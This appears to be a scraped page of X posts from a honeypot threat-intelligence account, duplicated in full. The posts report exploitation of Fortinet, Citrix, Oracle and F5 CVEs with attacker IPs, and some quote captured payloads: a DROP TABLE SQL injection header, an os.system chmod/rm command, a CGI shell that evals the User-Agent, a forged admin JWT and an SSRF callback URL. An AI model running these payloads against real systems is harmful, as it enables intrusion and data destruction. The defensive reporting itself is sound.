LunarCrush LLM | creator/twitter::1686989812702617600/posts

[GUEST ACCESS MODE: Data is scrambled or limited to provide examples. Make requests using your API key to unlock full data. Check https://lunarcrush.ai/auth for authentication information.]

[@DefusedCyber](/creator/twitter/DefusedCyber)
"⚠Elevated probing of CVE-2025-32756 (buffer overflow in multiple Fortinet products) Attackers looking to exploit this vulnerability use the /module/admin.fe path to enumerate targets Associated IPs from the past X days: 31.170.22.86 178.17.172.98 143.244.63.95 143.244.33.80"  
[X Link](https://x.com/DefusedCyber/status/1973434297685283100) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-01T17:06Z 3005 followers, 5641 engagements


"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 64.95.13.8 ( BLNWX ) VirusTotal Detections: 0/95 🟢 JWT payload translates into: "username": "admin" "profname": "prof_admin" "vdom": "root" "loginname": "admin""  
[X Link](https://x.com/DefusedCyber/status/1975242250373517373) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-06T16:50Z 3005 followers, 26.4K engagements


"Actor exploiting CVE-2025-25257 (FortiWeb SQLi) from 216.245.184.99 ( BLNWX ) VirusTotal Detections: 0/95 🟢 Payload 📸 Authorization: Bearer ';DROP/**/TABLE/**/fabric_user.a;--"  
[X Link](https://x.com/DefusedCyber/status/1979161102349934734) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-17T12:22Z 3005 followers, 69.1K engagements


"Actor exploiting CVE-2025-25257 (FortiWeb SQLi) from 149.88.26.225 ( Datacamp Limited ) VirusTotal Detections: 0/95 🟢 Payload 📸 . import os os.system('chmod +x /migadmin/cgi-bin/x.cgi && rm -f /var/log/lib/python3.10/pylab.py')"  
[X Link](https://x.com/DefusedCyber/status/1980214208076939440) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-20T10:07Z 3005 followers, 2260 engagements


"Actor exploiting CVE-2025-25257 (Critical FortiWeb SQL Injection Vulnerability) from 139.162.82.104 ( Akamai Connected Cloud ) VirusTotal Detections: 0/95 🟢 Decoded Payload 📸 #/bin/sh printf "Content-Type: text/htmlrn"; printf "rn"; eval $ HTTP_USER_AGENT import os # os.system('chmod +x /migadmin/cgi-bin/x.cgi && rm -f /var/log/lib/python3.10/pylab.py') #"  
[X Link](https://x.com/DefusedCyber/status/1976339547328766053) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-09T17:30Z 2951 followers, 11.3K engagements


"A Few Exploits Captured Over the Weekend 🧨 95.143.193.150 ( Internetport Sweden AB ) Exploiting CVE-2025-25257 (FortiWeb SQLi) 146.56.116.119 ( ORACLE-BMC-31898 ) Exploiting CVE-2025-5777 (CitrixBleed 2) 146.70.166.212 ( M247 Europe SRL ) Exploiting CVE-2025-61882 (Oracle E-Business RCE) All 0/95 on VirusTotal 🟢"  
[X Link](https://x.com/DefusedCyber/status/1977415061598564830) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-12T16:44Z 2971 followers, 11.5K engagements


"Ransomware vulns with highest exploit likelihood (past 30d): - CVE-2025-61882 (Oracle E-Busine.) +184037.21% - CVE-2021-26857 (Exchange On-Pre.) +384.58% - CVE-2021-27878 (Veritas Veritas.) +202.15% - CVE-2021-27877 (Veritas Veritas.) +183.71% - CVE-2021-27102 (Accellion File .) +38.22%"  
[X Link](https://x.com/DefusedCyber/status/1977709712561799257) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-13T12:15Z 2978 followers, 14.6K engagements


"Exploitation of Oracle E-Business RCE CVE-2025-61882 continues to be active: 139.180.218.167 ( AS-VULTR ) 37.221.127.41 ( Pq Hosting Plus S.r.l. ) 5.180.24.171 ( WorkTitans B.V. ) All 0/95 on VirusTotal 🟢"  
[X Link](https://x.com/DefusedCyber/status/1977735733893796007) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-13T13:58Z 2976 followers, 2355 engagements


"Actor mass exploiting CVE-2025-25257 (Critical FortiWeb SQLi) from 213.138.72.10 ( Limited Liability Company TTK-Svyaz ) VirusTotal Detections: 0/95 🟢 The actor exploited multiple honeypots across a short timeframe (1 hour)"  
[X Link](https://x.com/DefusedCyber/status/1978132533733667309) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-14T16:15Z 2971 followers, 7901 engagements


"For a limited time deploy a FortiWeb decoy / honeypot for FREE 👉"  
[X Link](https://x.com/DefusedCyber/status/1978132689824735240) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-14T16:15Z 2971 followers, XXX engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 23.234.102.176 ( TZULO ) VirusTotal Detections 0/95 🟢 The actor exploited multiple Oracle E-Business honeypots within a short timeframe 🎯"  
[X Link](https://x.com/DefusedCyber/status/1978361081803178471) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-15T07:23Z 2970 followers, 1842 engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 146.70.44.192 ( M247 Europe SRL ) VirusTotal Detections 0/95 🟢 Actor hit multiple Oracle E-Business honeypots in a short timeframe"  
[X Link](https://x.com/DefusedCyber/status/1978801348352131257) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-16T12:33Z 2968 followers, 1565 engagements


"Ransomware vulns with highest exploit likelihood (past 30d): - CVE-2025-61882 (Oracle E-Busine.) +191397.67% - CVE-2021-27878 (Veritas Veritas.) +167.85% - CVE-2021-27877 (Veritas Veritas.) +151.55% - CVE-2021-27102 (Accellion File .) +38.22% - CVE-2021-26857 (Exchange On-Pre.) +26.06%"  
[X Link](https://x.com/DefusedCyber/status/1980223102458962247) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-20T10:42Z 3005 followers, 2474 engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 37.72.168.234 (HVC-AS) VirusTotal Detections 0/95 🟢 This actor exploited several Oracle honeypots within a short timeframe"  
[X Link](https://x.com/DefusedCyber/status/1980695928022417662) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-21T18:01Z 3005 followers, XXX engagements


"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 169.150.198.85 ( Datacamp Limited ) VirusTotal Detections: X / XX 🟢 Exploit attempts to add a "prof_admin" user - a built-in access level in Fortinet devices that grants broad administrative permissions"  
[X Link](https://x.com/DefusedCyber/status/1976546196681535848) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-10T07:11Z 3001 followers, 9999 engagements


"Check the full ransomware vulnerabilities list 👉"  
[X Link](https://x.com/DefusedCyber/status/1977710216394207721) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-13T12:17Z 2999 followers, XXX engagements


"Breach Alert 🚨 A nation-state actor has exfiltrated BIG-IP source code and other sensitive data from F5. F5 has released multiple patches but the impact remains unclear We have added the F5 Big-IP honeypot for Defused Free users for a limited time - take advantage 🍯"  
[X Link](https://x.com/DefusedCyber/status/1978494230155743441) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-15T16:12Z 3002 followers, 18.1K engagements


"We want to add some more threat intel honeypots 🍯 What types honeypots should we deploy Help us choose👇"  
[X Link](https://x.com/DefusedCyber/status/1979937368573403137) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-19T15:47Z 2984 followers, 2178 engagements


"Actor exploiting CVE-2025-52970 (FortiWeb Authentication Bypass) from 182.8.97.131 ( PT. Telekomunikasi Selular) VirusTotal Detections: 0/95 🟢 This vulnerability has not yet entered known exploitation by CISA but exploits have hit honeypots since late August"  
[X Link](https://x.com/DefusedCyber/status/1978438709335703596) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-15T12:32Z 3002 followers, 2455 engagements


"Actor mass exploiting CVE-2025-5777 (Citrix Netscaler CitrixBleed 2) from 158.179.174.140 ( ORACLE-BMC-31898 ) VirusTotal Detections: 0/95 🟢 This actor has exploited multiple honeypots within the past X days"  
[X Link](https://x.com/DefusedCyber/status/1978864766518018133) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-16T16:45Z 3005 followers, 1154 engagements


"🚨 Defused users are seeing targeted exploits for F5 BIG-IP honeypots The recent F5 breach may cause more active exploitation against F5 infrastructure - more fresh intel For a limited time deploy a F5 BIG-IP decoy / honeypot for FREE 👉"  
[X Link](https://x.com/DefusedCyber/status/1979614594600681834) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-18T18:24Z 3005 followers, 4463 engagements


"Actor mass exploiting CVE-2025-5777 (Citrix Netscaler CitrixBleed 2) from 206.237.15.245 ( MOACK .Co. LTD ) VirusTotal Detections: 0/95 🟢 This actor exploited multiple Netscaler honeypots using CVE-2025-5777 within a span of XX minutes"  
[X Link](https://x.com/DefusedCyber/status/1979899080928329760) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-19T13:15Z 3005 followers, 1376 engagements


"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 81.0.246.16 ( Contabo GmbH ) VirusTotal Detections: 0/95 🟢 Payload 📸 Attempts to add a "prof_admin" user - a built-in access level in Fortinet devices that grants broad admin rights"  
[X Link](https://x.com/DefusedCyber/status/1980278833254187242) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-20T14:24Z 3005 followers, 3176 engagements


"Actor exploiting CVE-2023-46747 (F5 BIG-IP Auth Bypass Vuln ) from 104.140.226.176 ( AS62904 ) VirusTotal Detections 0/95 🟢 Actor attempts to create a new admin user with full permissions"  
[X Link](https://x.com/DefusedCyber/status/1980634240938283057) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-21T13:56Z 3005 followers, 2319 engagements


"Multiple actors mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) 194.127.167.106 ( Owl Limited ) 83.143.242.45 ( M247 Europe SRL ) Both actors exploited multiple Oracle honeypots simultaneously during a short time duration (within XX minutes) 🎯"  
[X Link](https://x.com/DefusedCyber/status/1979263668186681358) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-17T19:10Z 3005 followers, 3294 engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 103.140.45.8 ( Hostcenter ) VirusTotal Detections 0/95 🟢 Actor exploited CVE-2025-61882 on four different Oracle honeypots within a 15-minute timeframe"  
[X Link](https://x.com/DefusedCyber/status/1979968035097018421) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-19T17:49Z 3005 followers, 4284 engagements


"Actor exploiting CVE-2023-46747 (F5 BIG-IP Auth Bypass Vuln ) from 195.248.71.38 ( LLC Melt-internet ) VirusTotal Detections 0/95 🟢 Actor attempts to create a new admin user with full permissions"  
[X Link](https://x.com/DefusedCyber/status/1980578501838401765) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-21T10:14Z 3005 followers, 9266 engagements


"New Critical Vulnerabilities in Oracle E-Business🚨 Two new critical vulnerabilities disclosed by Oracle - CVE-2025-53072 & CVE-2025-62481 No POC available yet - this is the perfect time to deploy some Oracle E-Business honeypots 🍯"  
[X Link](https://x.com/DefusedCyber/status/1980937798212284692) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-22T10:02Z 3005 followers, 1771 engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 103.106.231.194 ( BrainStorm Network Inc ) VirusTotal Detections 0/95 🟢 This actor has been heavily exploiting Oracle E-Business honeypots for multiple days 🍯"  
[X Link](https://x.com/DefusedCyber/status/1980952429752426690) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-22T11:00Z 3005 followers, XXX engagements


"Actor exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 116.96.46.202 (Viettel Group) VirusTotal Detections 0/95 🟢 SSRF url 📸 param name="return_url"d3sf0irfhr5o320gc8s0di1mkfokc8i7a.oast.me/param"  
[X Link](https://x.com/DefusedCyber/status/1981040364053033095) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-22T16:50Z 3005 followers, 3917 engagements

[GUEST ACCESS MODE: Data is scrambled or limited to provide examples. Make requests using your API key to unlock full data. Check https://lunarcrush.ai/auth for authentication information.]

@DefusedCyber "⚠Elevated probing of CVE-2025-32756 (buffer overflow in multiple Fortinet products) Attackers looking to exploit this vulnerability use the /module/admin.fe path to enumerate targets Associated IPs from the past X days: 31.170.22.86 178.17.172.98 143.244.63.95 143.244.33.80"
X Link @DefusedCyber 2025-10-01T17:06Z 3005 followers, 5641 engagements

"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 64.95.13.8 ( BLNWX ) VirusTotal Detections: 0/95 🟢 JWT payload translates into: "username": "admin" "profname": "prof_admin" "vdom": "root" "loginname": "admin""
X Link @DefusedCyber 2025-10-06T16:50Z 3005 followers, 26.4K engagements

"Actor exploiting CVE-2025-25257 (FortiWeb SQLi) from 216.245.184.99 ( BLNWX ) VirusTotal Detections: 0/95 🟢 Payload 📸 Authorization: Bearer ';DROP//TABLE//fabric_user.a;--"
X Link @DefusedCyber 2025-10-17T12:22Z 3005 followers, 69.1K engagements

"Actor exploiting CVE-2025-25257 (FortiWeb SQLi) from 149.88.26.225 ( Datacamp Limited ) VirusTotal Detections: 0/95 🟢 Payload 📸 . import os os.system('chmod +x /migadmin/cgi-bin/x.cgi && rm -f /var/log/lib/python3.10/pylab.py')"
X Link @DefusedCyber 2025-10-20T10:07Z 3005 followers, 2260 engagements

"Actor exploiting CVE-2025-25257 (Critical FortiWeb SQL Injection Vulnerability) from 139.162.82.104 ( Akamai Connected Cloud ) VirusTotal Detections: 0/95 🟢 Decoded Payload 📸 #/bin/sh printf "Content-Type: text/htmlrn"; printf "rn"; eval $ HTTP_USER_AGENT import os # os.system('chmod +x /migadmin/cgi-bin/x.cgi && rm -f /var/log/lib/python3.10/pylab.py') #"
X Link @DefusedCyber 2025-10-09T17:30Z 2951 followers, 11.3K engagements

"A Few Exploits Captured Over the Weekend 🧨 95.143.193.150 ( Internetport Sweden AB ) Exploiting CVE-2025-25257 (FortiWeb SQLi) 146.56.116.119 ( ORACLE-BMC-31898 ) Exploiting CVE-2025-5777 (CitrixBleed 2) 146.70.166.212 ( M247 Europe SRL ) Exploiting CVE-2025-61882 (Oracle E-Business RCE) All 0/95 on VirusTotal 🟢"
X Link @DefusedCyber 2025-10-12T16:44Z 2971 followers, 11.5K engagements

"Ransomware vulns with highest exploit likelihood (past 30d): - CVE-2025-61882 (Oracle E-Busine.) +184037.21% - CVE-2021-26857 (Exchange On-Pre.) +384.58% - CVE-2021-27878 (Veritas Veritas.) +202.15% - CVE-2021-27877 (Veritas Veritas.) +183.71% - CVE-2021-27102 (Accellion File .) +38.22%"
X Link @DefusedCyber 2025-10-13T12:15Z 2978 followers, 14.6K engagements

"Exploitation of Oracle E-Business RCE CVE-2025-61882 continues to be active: 139.180.218.167 ( AS-VULTR ) 37.221.127.41 ( Pq Hosting Plus S.r.l. ) 5.180.24.171 ( WorkTitans B.V. ) All 0/95 on VirusTotal 🟢"
X Link @DefusedCyber 2025-10-13T13:58Z 2976 followers, 2355 engagements

"Actor mass exploiting CVE-2025-25257 (Critical FortiWeb SQLi) from 213.138.72.10 ( Limited Liability Company TTK-Svyaz ) VirusTotal Detections: 0/95 🟢 The actor exploited multiple honeypots across a short timeframe (1 hour)"
X Link @DefusedCyber 2025-10-14T16:15Z 2971 followers, 7901 engagements

"For a limited time deploy a FortiWeb decoy / honeypot for FREE 👉"
X Link @DefusedCyber 2025-10-14T16:15Z 2971 followers, XXX engagements

"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 23.234.102.176 ( TZULO ) VirusTotal Detections 0/95 🟢 The actor exploited multiple Oracle E-Business honeypots within a short timeframe 🎯"
X Link @DefusedCyber 2025-10-15T07:23Z 2970 followers, 1842 engagements

"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 146.70.44.192 ( M247 Europe SRL ) VirusTotal Detections 0/95 🟢 Actor hit multiple Oracle E-Business honeypots in a short timeframe"
X Link @DefusedCyber 2025-10-16T12:33Z 2968 followers, 1565 engagements

"Ransomware vulns with highest exploit likelihood (past 30d): - CVE-2025-61882 (Oracle E-Busine.) +191397.67% - CVE-2021-27878 (Veritas Veritas.) +167.85% - CVE-2021-27877 (Veritas Veritas.) +151.55% - CVE-2021-27102 (Accellion File .) +38.22% - CVE-2021-26857 (Exchange On-Pre.) +26.06%"
X Link @DefusedCyber 2025-10-20T10:42Z 3005 followers, 2474 engagements

"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 37.72.168.234 (HVC-AS) VirusTotal Detections 0/95 🟢 This actor exploited several Oracle honeypots within a short timeframe"
X Link @DefusedCyber 2025-10-21T18:01Z 3005 followers, XXX engagements

"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 169.150.198.85 ( Datacamp Limited ) VirusTotal Detections: X / XX 🟢 Exploit attempts to add a "prof_admin" user - a built-in access level in Fortinet devices that grants broad administrative permissions"
X Link @DefusedCyber 2025-10-10T07:11Z 3001 followers, 9999 engagements

"Check the full ransomware vulnerabilities list 👉"
X Link @DefusedCyber 2025-10-13T12:17Z 2999 followers, XXX engagements

"Breach Alert 🚨 A nation-state actor has exfiltrated BIG-IP source code and other sensitive data from F5. F5 has released multiple patches but the impact remains unclear We have added the F5 Big-IP honeypot for Defused Free users for a limited time - take advantage 🍯"
X Link @DefusedCyber 2025-10-15T16:12Z 3002 followers, 18.1K engagements

"We want to add some more threat intel honeypots 🍯 What types honeypots should we deploy Help us choose👇"
X Link @DefusedCyber 2025-10-19T15:47Z 2984 followers, 2178 engagements

"Actor exploiting CVE-2025-52970 (FortiWeb Authentication Bypass) from 182.8.97.131 ( PT. Telekomunikasi Selular) VirusTotal Detections: 0/95 🟢 This vulnerability has not yet entered known exploitation by CISA but exploits have hit honeypots since late August"
X Link @DefusedCyber 2025-10-15T12:32Z 3002 followers, 2455 engagements

"Actor mass exploiting CVE-2025-5777 (Citrix Netscaler CitrixBleed 2) from 158.179.174.140 ( ORACLE-BMC-31898 ) VirusTotal Detections: 0/95 🟢 This actor has exploited multiple honeypots within the past X days"
X Link @DefusedCyber 2025-10-16T16:45Z 3005 followers, 1154 engagements

"🚨 Defused users are seeing targeted exploits for F5 BIG-IP honeypots The recent F5 breach may cause more active exploitation against F5 infrastructure - more fresh intel For a limited time deploy a F5 BIG-IP decoy / honeypot for FREE 👉"
X Link @DefusedCyber 2025-10-18T18:24Z 3005 followers, 4463 engagements

"Actor mass exploiting CVE-2025-5777 (Citrix Netscaler CitrixBleed 2) from 206.237.15.245 ( MOACK .Co. LTD ) VirusTotal Detections: 0/95 🟢 This actor exploited multiple Netscaler honeypots using CVE-2025-5777 within a span of XX minutes"
X Link @DefusedCyber 2025-10-19T13:15Z 3005 followers, 1376 engagements

"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 81.0.246.16 ( Contabo GmbH ) VirusTotal Detections: 0/95 🟢 Payload 📸 Attempts to add a "prof_admin" user - a built-in access level in Fortinet devices that grants broad admin rights"
X Link @DefusedCyber 2025-10-20T14:24Z 3005 followers, 3176 engagements

"Actor exploiting CVE-2023-46747 (F5 BIG-IP Auth Bypass Vuln ) from 104.140.226.176 ( AS62904 ) VirusTotal Detections 0/95 🟢 Actor attempts to create a new admin user with full permissions"
X Link @DefusedCyber 2025-10-21T13:56Z 3005 followers, 2319 engagements

"Multiple actors mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) 194.127.167.106 ( Owl Limited ) 83.143.242.45 ( M247 Europe SRL ) Both actors exploited multiple Oracle honeypots simultaneously during a short time duration (within XX minutes) 🎯"
X Link @DefusedCyber 2025-10-17T19:10Z 3005 followers, 3294 engagements

"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 103.140.45.8 ( Hostcenter ) VirusTotal Detections 0/95 🟢 Actor exploited CVE-2025-61882 on four different Oracle honeypots within a 15-minute timeframe"
X Link @DefusedCyber 2025-10-19T17:49Z 3005 followers, 4284 engagements

"Actor exploiting CVE-2023-46747 (F5 BIG-IP Auth Bypass Vuln ) from 195.248.71.38 ( LLC Melt-internet ) VirusTotal Detections 0/95 🟢 Actor attempts to create a new admin user with full permissions"
X Link @DefusedCyber 2025-10-21T10:14Z 3005 followers, 9266 engagements

"New Critical Vulnerabilities in Oracle E-Business🚨 Two new critical vulnerabilities disclosed by Oracle - CVE-2025-53072 & CVE-2025-62481 No POC available yet - this is the perfect time to deploy some Oracle E-Business honeypots 🍯"
X Link @DefusedCyber 2025-10-22T10:02Z 3005 followers, 1771 engagements

"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 103.106.231.194 ( BrainStorm Network Inc ) VirusTotal Detections 0/95 🟢 This actor has been heavily exploiting Oracle E-Business honeypots for multiple days 🍯"
X Link @DefusedCyber 2025-10-22T11:00Z 3005 followers, XXX engagements

"Actor exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 116.96.46.202 (Viettel Group) VirusTotal Detections 0/95 🟢 SSRF url 📸 param name="return_url"d3sf0irfhr5o320gc8s0di1mkfokc8i7a.oast.me/param"
X Link @DefusedCyber 2025-10-22T16:50Z 3005 followers, 3917 engagements